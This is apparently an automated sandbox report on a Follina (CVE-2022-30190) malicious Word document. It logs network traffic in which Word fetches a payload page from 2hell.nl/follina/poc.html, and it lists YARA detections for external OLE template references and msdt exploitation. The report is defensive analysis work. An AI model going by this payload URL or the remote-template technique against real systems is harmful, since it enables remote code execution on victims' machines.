Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 178.21.112.152:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443

Source: global traffic	DNS query: name: 2hell.nl
Source: global traffic	DNS query: name: 2hell.nl
Source: global traffic	DNS query: name: 2hell.nl
Source: global traffic	DNS query: name: 2hell.nl
Source: global traffic	DNS query: name: 2hell.nl
Source: global traffic	DNS query: name: 2hell.nl
Source: global traffic	DNS query: name: 2hell.nl
Source: global traffic	DNS query: name: 2hell.nl
Source: global traffic	DNS query: name: 2hell.nl
Source: global traffic	DNS query: name: 2hell.nl
Source: global traffic	DNS query: name: 2hell.nl
Source: global traffic	DNS query: name: 2hell.nl
Source: global traffic	DNS query: name: 2hell.nl
Source: global traffic	DNS query: name: 2hell.nl
Source: global traffic	DNS query: name: 2hell.nl

Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 178.21.112.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 178.21.112.152:443

Source: global traffic	HTTP traffic detected: GET /follina/poc.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 2hell.nlConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /follina/poc.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 2hell.nlIf-Modified-Since: Mon, 30 May 2022 19:35:11 GMTIf-None-Match: "1a76-5e03fc121ca9b"Connection: Keep-Alive

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: unknown	HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49185 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49187 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Source: ~WRF{FB6581E1-1A5E-4649-84C2-3FA331ABA6D2}.tmp.0.dr, ~WRS{908054AA-4410-45BE-A60F-B0BC543AE3BB}.tmp.0.dr	String found in binary or memory: https://2hell.nl/follina/poc.html
Source: ~WRF{FB6581E1-1A5E-4649-84C2-3FA331ABA6D2}.tmp.0.dr	String found in binary or memory: https://2hell.nl/follina/poc.htmlyX

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9DD68104-9F74-4147-BF67-D8C1A9A331E2}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: 2hell.nl

Source: global traffic	HTTP traffic detected: GET /follina/poc.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 2hell.nlConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /follina/poc.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 2hell.nlIf-Modified-Since: Mon, 30 May 2022 19:35:11 GMTIf-None-Match: "1a76-5e03fc121ca9b"Connection: Keep-Alive

Source: unknown

HTTPS traffic detected: 178.21.112.152:443 -> 192.168.2.22:49173 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: document.xml.rels, type: SAMPLE

Matched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen

Source: sslproxydump.pcap, type: PCAP	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: sslproxydump.pcap, type: PCAP	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: document.xml.rels, type: SAMPLE	Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: document.xml.rels, type: SAMPLE	Matched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
